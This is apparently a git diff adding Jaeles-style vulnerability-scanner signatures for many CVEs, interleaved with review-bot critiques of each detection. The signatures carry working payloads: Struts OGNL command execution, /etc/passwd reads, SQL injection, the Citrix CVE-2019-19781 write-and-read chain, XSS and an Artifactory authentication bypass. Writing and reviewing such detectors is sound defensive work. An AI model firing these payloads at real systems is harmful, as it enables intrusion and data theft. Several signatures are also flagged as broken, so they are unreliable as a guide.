Waterfox/56.3 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - diff --git a/cves/apache-ofbiz-xss-cve-2020-9496.yaml b/cves/apache-ofbiz-xss-cve-2020-9496.yaml new file mode 100644 index 0000000..0802cc2 
--- /dev/null +++ b/cves/apache-ofbiz-xss-cve-2020-9496.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-9496 +info: + name: Apache OFBiz XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + + +requests: + - method: POST + url: >- + {{.root}}webtools/control/xmlrpc + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Origin: http://{{.Host}} + - Content-Type: application/xml + data: JAELEScvebase + detections: + - >- + StatusCode() == 200 && StringSearch("resHeaders", "Content-Type: text/xml") && StringSearch("resBody", "No such service [JAELES]") && StringSearch("resBody", "faultString") && StringSearch("resBody", "methodResponse") + +references: + - https://www.cvebase.com/cve/2020/9496 diff --git a/cves/apache-struts-rce-cve-2013-2251.yaml b/cves/apache-struts-rce-cve-2013-2251.yaml new file mode 100644 index 0000000..3999bfc --- /dev/null +++ b/cves/apache-struts-rce-cve-2013-2251.yaml 
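Review bot: The detection requires `No such service [JAELES]` in the response body, but the posted `data: JAELEScvebase` is not an XML-RPC call and names no service, so the endpoint would presumably answer with a parse fault and this signature never fires. Unless the engine expands `data:` in a way not visible in the hunk, the body needs to be a minimal methodCall whose methodName is the token the detection expects, e.g. `data: '<?xml version="1.0"?><methodCall><methodName>JAELES</methodName></methodCall>'`. A one-line comment above `data:` explaining that the method name is deliberately bogus and only serves as a reflected marker would save the next maintainer the same puzzle.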
@@ -0,0 +1,31 @@ +id: CVE-2013-2251 +info: + name: Apache Struts 2 RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + index.action + login.action +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "uid=") + - method: GET + url: >- + {{.root}}{{.endpoint}}?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "uid=") +references: + - https://www.cvebase.com/cve/2013/2251 diff --git a/cves/apache-struts-rce-cve-2017-5638.yaml b/cves/apache-struts-rce-cve-2017-5638.yaml new file mode 100644 index 0000000..b8f709b --- /dev/null +++ b/cves/apache-struts-rce-cve-2017-5638.yaml 
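Review bot: Both detections accept any 200 response whose body contains `uid=`, which also matches ordinary HTML (form field names, query strings in links), so a patched host can still be reported; match the shape of real `id` output instead, `StatusCode() == 200 && RegexSearch("resBody", "uid=[0-9]+\\([a-z_][a-z0-9_-]*\\)")`. The two requests are otherwise identical apart from the `action:` versus `redirect:` prefix; if the engine iterates several `variables:` lists, the prefix could be a second variable so the header and detection are not duplicated.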
@@ -0,0 +1,24 @@ +id: CVE-2017-5638 +info: + name: Apache Struts 2 RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: +requests: + - method: GET + url: >- + {{.root}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Content-Type: "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Jaeles','cvebase')}.multipart/form-data" + - Pragma: no-cache + - Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* + + detections: + - >- + StatusCode() == 200 && StringSearch("resHeaders", "X-Jaeles: cvebase") +references: + - https://www.cvebase.com/cve/2017/5638 diff --git a/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml b/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml new file mode 100644 index 0000000..2f5f6d5 --- /dev/null +++ b/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml @@ -0,0 +1,23 @@ +id: CVE-2018-11759 +info: + name: Apache Tomcat JK Status Manager Exposed + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + jkstatus + jkstatus; +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "JK Status Manager") +references: + - https://www.cvebase.com/cve/2018/11759 diff --git a/cves/tomcat-open-redirect.yaml b/cves/apache-tomcat-open-redirect-cve-2018-11784.yaml similarity index 63% rename from cves/tomcat-open-redirect.yaml rename to cves/apache-tomcat-open-redirect-cve-2018-11784.yaml index a04046f..e522016 100644 --- a/cves/tomcat-open-redirect.yaml +++ b/cves/apache-tomcat-open-redirect-cve-2018-11784.yaml 
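Review bot: The bare `variables:` key on the new side has no items and parses as a YAML null; the CVE-2018-11759 signature in the next hunk gives it a list and the other new files omit it, so drop the line rather than rely on the loader tolerating a null where it expects a sequence. The `Content-Type:` header also deserves a short comment, since nothing in the file says why it carries an expression: `# CVE-2017-5638: the multipart Content-Type value is evaluated as OGNL; a harmless addHeader call is used so the X-Jaeles response header proves evaluation without side effects`.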
@@ -1,6 +1,6 @@ -id: cve-tomcat-04 +id: CVE-2018-11784 info: - name: Tomcat Open Redirect - CVE-2018-11784 + name: Apache Tomcat Open Redirect risk: High requests: @@ -12,7 +12,7 @@ requests: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 detections: - >- - StatusCode() == 302 && StringSearch('resHeader', 'google.com') && !RegexSearch('resHeader', 'Location.*{{.Domain}}') + StatusCode() == 302 && StringSearch('resHeader', 'google.com') && !RegexSearch('resHeader', 'Location.*{{.Domain}}.*') reference: - - link: https://github.com/breaktoprotect/CVE-2017-12615 \ No newline at end of file + - https://www.cvebase.com/cve/2018/11784 \ No newline at end of file diff --git a/cves/tomcat-put-method.yaml b/cves/apache-tomcat-put-cve-2017-12615.yaml similarity index 81% rename from cves/tomcat-put-method.yaml rename to cves/apache-tomcat-put-cve-2017-12615.yaml index 1c298ce..ae0275a 100644 --- a/cves/tomcat-put-method.yaml +++ b/cves/apache-tomcat-put-cve-2017-12615.yaml @@ -1,7 +1,6 @@ -# info to search signature -id: cve-tomcat-03 +id: CVE-2017-12615 info: - name: Tomcat PUT method allowed - CVE-2017-12615 + name: Tomcat PUT method allowed risk: High variables: @@ -29,4 +28,4 @@ requests: StatusCode() == 200 && StringSearch('response', 'JSP uploaded') reference: - - link: https://github.com/breaktoprotect/CVE-2017-12615 \ No newline at end of file + - https://www.cvebase.com/cve/2017/12615 \ No newline at end of file diff --git a/cves/apache-tomcat-rce-cve-2020-9484.yaml b/cves/apache-tomcat-rce-cve-2020-9484.yaml new file mode 100644 index 0000000..17308e8 --- /dev/null +++ b/cves/apache-tomcat-rce-cve-2020-9484.yaml 
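Review bot: The only change to the CVE-2018-11784 detection is appending `.*` to `Location.*{{.Domain}}.*`, which is a no-op for an unanchored `RegexSearch` and so leaves the logic exactly as before; if the intent was to tighten the redirect check, anchoring on the header would do it, e.g. `!RegexSearch('resHeader', '(?i)Location: https?://[^/]*{{.Domain}}')`. The file also keeps the singular `reference:` key while the new signatures in this commit use `references:`, so tooling that reads one key will silently drop the other; settling on `references:` here keeps the corpus uniform.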
@@ -0,0 +1,21 @@ +id: CVE-2020-9484 +info: + name: Apache Tomcat RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + url: >- + {{.root}}cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy + detections: + - >- + StatusCode() == 500 && RegexSearch("resBody", "Exception") && RegexSearch("resBody", "ObjectInputStream") && RegexSearch("resBody", "PersistentManagerBase") + +references: + - https://www.cvebase.com/cve/2020/9484 diff --git a/cves/artica-web-proxy-sqli-cve-2020-17506.yaml b/cves/artica-web-proxy-sqli-cve-2020-17506.yaml new file mode 100644 index 0000000..1658a6c --- /dev/null +++ b/cves/artica-web-proxy-sqli-cve-2020-17506.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-17506 +info: + name: Artica Web Proxy SQLi + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + url: >- + {{.root}}fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + (StatusCode() == 200 || StatusCode() == 301 || StatusCode() == 302) && StringSearch("resHeaders", "PHPSESSID") && StringSearch("resBody", "artica-applianc") + +references: + - https://www.cvebase.com/cve/2020/17506 diff --git a/cves/artifactory-improper-authorization-cve-2019-9733.yaml b/cves/artifactory-improper-authorization-cve-2019-9733.yaml new file mode 100644 index 0000000..c6cdd96 --- /dev/null +++ b/cves/artifactory-improper-authorization-cve-2019-9733.yaml 
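Review bot: The request path `cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd` has nothing to do with the Tomcat session-deserialisation trigger, which is carried entirely by the `Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy` header; it reads like a command-injection payload left over from a different product's CGI, and it contains an unencoded space and quote. A reviewer of the scan logs will see an attack on an unrelated CGI and a WAF may block the request before Tomcat's PersistentManager ever sees the cookie. Point the URL at `{{.root}}` alone (any path served by Tomcat works for the cookie trigger) and drop the query string.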
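Review bot: The CVE-2020-17506 detection accepts 200, 301 or 302 as long as a `PHPSESSID` cookie appears and the body contains "artica-applianc", but a PHP session cookie is issued on essentially any request to a PHP login page and the body string only identifies the product, so a patched Artica instance that rejects the injected `apikey` would presumably still match. The check confirms "this is an Artica login page", not "the UNION payload was accepted". If the bypass succeeds the response should carry an authenticated redirect or session marker distinct from the failed-login page; keying on that (or on the absence of the login form) would make the hit meaningful, and the truncated needle should at least be spelled out as `artica-appliance` if that is the intended string.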
@@ -0,0 +1,34 @@ +id: CVE-2019-9733 +info: + name: Artifactory Improper Authorization + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + artifactory/ui/auth/login +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?_spring_security_remember_me=false + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - X-Requested-With: artUI + - serial: 58 + - X-Forwarded-For: 127.0.0.1 + - Request-Agent: artifactoryUI + - Content-Type: application/json + - Origin: http://{{Hostname}} + - Referer: http://{{Hostname}}/artifactory/webapp/ + - Accept-Encoding: gzip, deflate + - Accept-Language: en-US,en;q=0.9 + - Connection: close + body: {"user":"access-admin","password":"password","type":"login"} + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", '"username": "access-admin"') + +references: + - https://www.cvebase.com/cve/2019/9733 diff --git a/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml b/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml new file mode 100644 index 0000000..705d46d --- /dev/null +++ b/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml @@ -0,0 +1,24 @@ +id: CVE-2019-3396 +info: + name: Atlassian Confluence Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + rest/tinymce/1/macro/preview +requests: + - method: POST + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + body: {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "contextConfigLocation") + +references: + - https://www.cvebase.com/cve/2019/3396 
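Review bot: The CVE-2019-9733 login attempt is sent as `method: GET` with a JSON `body`, yet the Artifactory UI login endpoint is normally driven by POST; a GET with a body will most likely be ignored or rejected, so the `"username": "access-admin"` detection would never fire even on a vulnerable host — change it to `method: POST`. The `Origin` and `Referer` headers use `{{Hostname}}` without the leading dot that every other placeholder in this corpus carries (`{{.BaseURL}}`, `{{.Domain}}`), so they will probably be sent literally; use `{{.Domain}}` or whatever the engine exposes for the host. The `X-Forwarded-For: 127.0.0.1` header is doing the real work here (the bypass hinges on the server believing the request is local), which deserves a one-line comment so it is not "cleaned up" later.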
diff --git a/cves/atlassian-confluence-xss-cve-2018-5230.yaml b/cves/atlassian-confluence-xss-cve-2018-5230.yaml new file mode 100644 index 0000000..e7d7343 --- /dev/null +++ b/cves/atlassian-confluence-xss-cve-2018-5230.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-5230 +info: + name: Atlassian Confluence XSS + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + pages/includes/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", 'SRC="javascript:alert(1337)">') +references: + - https://www.cvebase.com/cve/2018/5230 diff --git a/cves/atlassian-rce-cve-2019-11580.yaml b/cves/atlassian-rce-cve-2019-11580.yaml new file mode 100644 index 0000000..f9be9f7 --- /dev/null +++ b/cves/atlassian-rce-cve-2019-11580.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-11580 +info: + name: Atlassian Crowd Data Center RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + crowd/plugins/servlet/exp +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?cmd=cat%20/etc/passwd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") +references: + - https://www.cvebase.com/cve/2019/11580 diff --git a/cves/cisco-asa-path-traversal-cve-2018-0296.yaml b/cves/cisco-asa-path-traversal-cve-2018-0296.yaml new file mode 100644 index 0000000..502fd94 --- /dev/null +++ b/cves/cisco-asa-path-traversal-cve-2018-0296.yaml 
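Review bot: Requesting `crowd/plugins/servlet/exp?cmd=cat%20/etc/passwd` does not test CVE-2019-11580 — the vulnerability is the unauthenticated plugin-upload endpoint of the pdkinstall development plugin, and an `exp` servlet exists only after someone has already uploaded a plugin that registers it. A vulnerable but untouched Crowd host will therefore never match, while a match means the host is already carrying somebody's backdoor, which is a very different finding and should be labelled as such. If uploading a plugin is too intrusive for a signature, the usual non-destructive indicator is the response of the upload action itself (e.g. a GET to `crowd/admin/uploadplugin.action` returning a plugin-specific error when pdkinstall is enabled); at minimum rename this to make clear it detects a prior compromise rather than the CVE.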
@@ -0,0 +1,22 @@ +id: CVE-2018-0296 +info: + name: Cisco ASA Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + +CSCOU+/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}../+CSCOE+/files/file_list.json?path=/sessions + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "///sessions") +references: + - https://www.cvebase.com/cve/2018/0296 diff --git a/cves/cisco-asa-path-traversal-cve-2020-3187.yaml b/cves/cisco-asa-path-traversal-cve-2020-3187.yaml new file mode 100644 index 0000000..406a1c0 --- /dev/null +++ b/cves/cisco-asa-path-traversal-cve-2020-3187.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-3187 +info: + name: Cisco ASA & FTD Path Traversal + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + +CSCOE+/session_password.html + +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resHeader", "webvpn") +references: + - https://www.cvebase.com/cve/2020/3187 diff --git a/cves/cisco-asa-lfi.yaml b/cves/cisco-asa-path-traversal-cve-2020-3452.yaml similarity index 91% rename from cves/cisco-asa-lfi.yaml rename to cves/cisco-asa-path-traversal-cve-2020-3452.yaml index 037c240..1262c13 100644 --- a/cves/cisco-asa-lfi.yaml +++ b/cves/cisco-asa-path-traversal-cve-2020-3452.yaml @@ -1,4 +1,4 @@ -id: cisco-asa-lfi +id: CVE-2020-3452 donce: true info: name: Cisco ASA - Unauthenticated LFI and Delete File (CVE-2020-3452) 
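Review bot: The CVE-2020-3187 signature fetches `+CSCOE+/session_password.html` and reports Critical on `StatusCode() == 200 && StringSearch("resHeader", "webvpn")`, which is satisfied by any ASA or FTD with the WebVPN portal enabled, patched or not — no traversal sequence is sent and no file outside the portal is read. That is a product fingerprint, not evidence of the path-traversal or file-deletion bug, and it will produce a Critical finding on every clientless-VPN box in scope. Either probe the actual traversal (a read of a known file via the vulnerable path, with a content check on the result) or downgrade this to a fingerprint with `confidence: Tentative` as the ShareFile signature in this commit does.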
@@ -35,4 +35,5 @@ reference: - links: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 - https://twitter.com/aboul3la/status/1286012324722155525/photo/1 - - https://github.com/dinhbaouit/CISCO-Remove-File \ No newline at end of file + - https://github.com/dinhbaouit/CISCO-Remove-File + - https://www.cvebase.com/cve/2020/3452 \ No newline at end of file diff --git a/cves/cisco-dos-cve-2020-16139.yaml b/cves/cisco-dos-cve-2020-16139.yaml new file mode 100644 index 0000000..5e28628 --- /dev/null +++ b/cves/cisco-dos-cve-2020-16139.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-16139 +info: + name: Cisco DoS + risk: Low + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + localmenus.cgi +requests: + - method: POST + url: >- + {{.root}}{{.endpoint}}?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") && StringSearch("resHeaders", "application/xml") + +references: + - https://www.cvebase.com/cve/2020/16139 diff --git a/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml b/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml new file mode 100644 index 0000000..bffdf95 --- /dev/null +++ b/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml 
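Review bot: The CVE-2020-16139 detection only confirms that the `data` value posted to `localmenus.cgi?func=609&rphl=1` is echoed back in an `application/xml` response; the crash condition itself is never reached with a 46-byte payload, so a match is a reflection fingerprint rather than proof of the denial of service, and the name `Cisco DoS` gives triage nothing to work with. Name the affected product from the referenced advisory in `info.name`, and add a comment stating that the payload is intentionally short so the device is not rebooted — otherwise the next maintainer may "fix" it by pasting the full PoC and knock over production phones.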
@@ -0,0 +1,22 @@ +id: CVE-2019-1653 +info: + name: Cisco RV320 RV326 Configuration Leak + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + cgi-bin/config.exp +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "sysconfig") +references: + - https://www.cvebase.com/cve/2019/1653 diff --git a/cves/citrix-adc-lfi.yaml b/cves/citrix-adc-lfi-cve-2020-8193.yaml similarity index 96% rename from cves/citrix-adc-lfi.yaml rename to cves/citrix-adc-lfi-cve-2020-8193.yaml index 6abb964..33b3447 100644 --- a/cves/citrix-adc-lfi.yaml +++ b/cves/citrix-adc-lfi-cve-2020-8193.yaml @@ -1,4 +1,4 @@ -id: citrix-adc-lfi +id: CVE-2020-8193 single: true info: name: Citrix ADC LFI - CVE-2020-8193 @@ -58,3 +58,4 @@ reference: - links: - https://dmaasland.github.io/posts/citrix.html - https://support.citrix.com/article/CTX276688 + - https://www.cvebase.com/cve/2020/8193 diff --git a/cves/citrix-rce.yaml b/cves/citrix-adc-path-traversal-cve-2019-19781.yaml similarity index 56% rename from cves/citrix-rce.yaml rename to cves/citrix-adc-path-traversal-cve-2019-19781.yaml index 54e7bc5..4599d61 100644 --- a/cves/citrix-rce.yaml +++ b/cves/citrix-adc-path-traversal-cve-2019-19781.yaml 
@@ -1,14 +1,27 @@ -# info to search signature -id: citrix-rce-01 +id: CVE-2019-19781 info: - name: Citrix GateWay RCE (CVE-2019-19781) - risk: Critical + name: Citrix ADC Path Traversal + risk: High -requests: +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + vpn/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}../vpns/cfg/smb.conf + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StringSearch("resBody", "[global]") - method: POST redirect: false url: >- - {{.BaseURL}}/vpn/../vpns/portal/scripts/newbm.pl + {{.BaseURL}}{{.endpoint}}../vpns/portal/scripts/newbm.pl headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - NSC_USER: ../../../netscaler/portal/templates/somuniquestr @@ -19,11 +32,11 @@ requests: detections: - >- 1 == 0 - # checking if exploit works + # checking if exploit works - method: GET redirect: false url: >- - {{.BaseURL}}/vpn/../vpns/portal/somuniquestr.xml + {{.BaseURL}}{{.endpoint}}../vpns/portal/somuniquestr.xml headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - NSC_USER: nsroot @@ -31,6 +44,5 @@ requests: detections: - >- StatusCode() == 200 && StringSearch("response", "root:") - -reference: - - link: https://support.citrix.com/article/CTX267027 \ No newline at end of file +references: + - https://www.cvebase.com/cve/2019/19781 diff --git a/cves/citrix-code-injection-cve-2020-8194.yaml b/cves/citrix-code-injection-cve-2020-8194.yaml new file mode 100644 index 0000000..07fa93b --- /dev/null +++ b/cves/citrix-code-injection-cve-2020-8194.yaml 
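Review bot: The two later steps were changed from `{{.BaseURL}}/vpn/../vpns/...` to `{{.BaseURL}}{{.endpoint}}../vpns/...`, and because `root` is `'{{.BaseURL}}/'` while `BaseURL` has no trailing slash, they now request `http://hostvpn/../vpns/portal/scripts/newbm.pl` — a broken URL that will never reach the appliance; both should read `{{.root}}{{.endpoint}}../vpns/...` like the new first request. The renamed file also drops `risk` from Critical to High and calls itself "Path Traversal", yet it still performs the full exploit — writing a template through `newbm.pl` and reading `root:` back — so an intrusive, file-writing RCE check is now labelled as a read-only traversal; keep the risk and name honest or remove the write steps. Finally the new `smb.conf` probe has neither `redirect: false` nor a `StatusCode() == 200` guard, unlike the two steps that follow it, so a redirect page that happens to contain `[global]` would count as a hit.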
@@ -0,0 +1,23 @@ +id: CVE-2020-8194 +info: + name: Citrix CDC & Gateway Code Injection + risk: High + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + url: >- + {{.root}}menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Content-Type: application/x-www-form-urlencoded + - X-NITRO-USER: xpyZxwy6 + - Cookie: startupapp=st + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") && StringSearch("resHeaders", "application/x-java-jnlp-file") + +references: + - https://www.cvebase.com/cve/2020/8194 diff --git a/cves/citrix-lfi.yaml b/cves/citrix-lfi.yaml deleted file mode 100644 index ffaa065..0000000 --- a/cves/citrix-lfi.yaml +++ /dev/null @@ -1,19 +0,0 @@ -# info to search signature -id: netscaler-lfi-01 -info: - name: NetScaler LFI - CVE-2019-19781 - risk: High - -requests: - - method: GET - redirect: false - url: >- - {{.BaseURL}}/vpn/../vpns/cfg/smb.conf - headers: - - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - detections: - - >- - StatusCode() == 200 && StringSearch("response", "[global]") - -reference: - - link: https://support.citrix.com/article/CTX267027 diff --git a/cves/citrix-sharefile-lfi.yaml b/cves/citrix-path-traversal-cve-2020-7473.yaml similarity index 52% rename from cves/citrix-sharefile-lfi.yaml rename to cves/citrix-path-traversal-cve-2020-7473.yaml index b8937b4..74aa786 100644 --- a/cves/citrix-sharefile-lfi.yaml +++ b/cves/citrix-path-traversal-cve-2020-7473.yaml @@ -1,6 +1,6 @@ -id: citrix-share-lfi +id: CVE-2020-7473 info: - name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read - CVE-2020-7473 + name: Citrix ShareFile StorageZones Path Traversal risk: Potential confidence: Tentative 
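Review bot: As rendered here, the CVE-2020-8194 detection is `StringSearch("resBody", "")`, and an empty needle matches every body, so any 200 with an `application/x-java-jnlp-file` content type — i.e. every working `menu/guiw` endpoint — is reported as code injection. If this is an extraction artefact of a stripped HTML tag it needs restoring; if not, search for the injected token instead, e.g. `StringSearch("resBody", "nonexistent.1337")`. The URL also carries a raw `"` and `>` in `protocol=nonexistent.1337">`; URL-encoding them (`%22%3E`) avoids the HTTP client or an intermediary rewriting the request.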
@@ -17,6 +17,14 @@ requests: detections: - >- StatusCode() == 200 && StringSearch('body', 'bit app support') && StringSearch('body', 'extensions') - -reference: - - link: https://support.citrix.com/article/CTX269106 + - method: GET + redirect: false + url: >- + {{.root}}/UploadTest.aspx + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + detections: + - >- + StatusCode() == 200 && ContentLength('body') == 0 && StringSearch('resHeader', 'Access-Control-Allow-Origin: *') +references: + - https://www.cvebase.com/cve/2020/7473 diff --git a/cves/citrix-reflected-xss-cve-2020-8191.yaml b/cves/citrix-reflected-xss-cve-2020-8191.yaml new file mode 100644 index 0000000..fb47ed1 --- /dev/null +++ b/cves/citrix-reflected-xss-cve-2020-8191.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-8191 +info: + name: Citrix ADC & Gateway Reflected XSS + risk: High + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: POST + url: >- + {{.root}}menu/stapp + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Content-Type: application/x-www-form-urlencoded + - X-NITRO-USER: xpyZxwy6 + body: sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") + +references: + - https://www.cvebase.com/cve/2020/8191 diff --git a/cves/citrix-sharefile-exposed.yaml 